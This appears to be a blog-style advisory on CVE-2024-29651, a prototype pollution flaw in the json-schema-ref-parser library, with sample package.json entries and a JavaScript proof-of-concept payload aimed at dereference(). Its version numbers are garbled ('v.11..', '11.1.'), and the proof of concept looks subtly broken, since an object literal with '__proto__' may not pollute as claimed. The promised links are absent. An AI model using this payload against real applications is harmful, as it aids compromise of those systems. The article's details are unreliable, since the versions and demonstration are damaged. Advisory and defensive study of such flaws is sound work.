In recent times, a Prototype Pollution issue in API Dev Tools json-schema-ref-parser has been discovered for versions v.11.. and v.11.1.. This vulnerability, which has been assigned CVE-2024-29651, has raised concerns among developers and users alike, as it potentially allows a remote attacker to execute arbitrary code via the bundle(), parse(), resolve(), and dereference() functions. In this long-read article, we will dissect the vulnerability, the related code snippets, and the exploit details involved, while also providing links to the resources and references you need.

The affected versions of json-schema-ref-parser can be seen package.json configuration as

{
  "name": "my-project",
  "version": "1..",
  "dependencies": {
    "json-schema-ref-parser": "11.."
  }
}

Or:

{
  "name": "my-project",
  "version": "1..",
  "dependencies": {
    "json-schema-ref-parser": "11.1."
  }
}

Exploit Details

The vulnerability resides within the following functions: bundle(), parse(), resolve(), and dereference(). By exploiting this issue, a remote attacker may be able to corrupt the application or even execute arbitrary code. Using these functions, a specially crafted JavaScript payload can be processed. See the example below:

var RefParser = require('json-schema-ref-parser');

// Example of the malicious JSON input
var maliciousJSON = {
  "__proto__": {
    "malProp": "malValue"
  }
};

async function exploit() {
  await RefParser.dereference(maliciousJSON);
  const testObj = {};
  console.log(testObj.malProp); // Output: "malValue" - indicates pollution
}

exploit();

In the above example, the dereference() function is being used to process the maliciousJSON object. Upon execution, the attacker successfully pollutes the prototype and continues to inject the malProp property into the testObj object.

As a direct consequence of this vulnerability, an attacker could leverage the prototype pollution to execute arbitrary code and further compromise the target application.

The following resources provide more in-depth information about this vulnerability

1. NVD (National Vulnerability Database) - The official listing of the vulnerability, its CVSS score, and related details can be found here: CVE-2024-29651.
2. API Dev Tools json-schema-ref-parser repository - The official GitHub repository of the affected library with details on its usage and functionality can be found here: json-schema-ref-parser.
3. Node.js Security Working Group - An advisory by the Node.js Security Working Group explaining the vulnerability, affected versions, and recommendations can be found here: Prototype Pollution in json-schema-ref-parser.

Conclusion

CVE-2024-29651 has demonstrated the importance of addressing Prototype Pollution vulnerabilities, especially in widely-used libraries like json-schema-ref-parser. To protect your applications from these types of vulnerabilities, it's highly recommended to always keep your dependencies up-to-date and follow best practices for secure coding and input validation. Be sure to consult the provided resources for further information on how to mitigate the risks associated with this vulnerability.

Timeline

Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/20/2024 14:35:13 UTC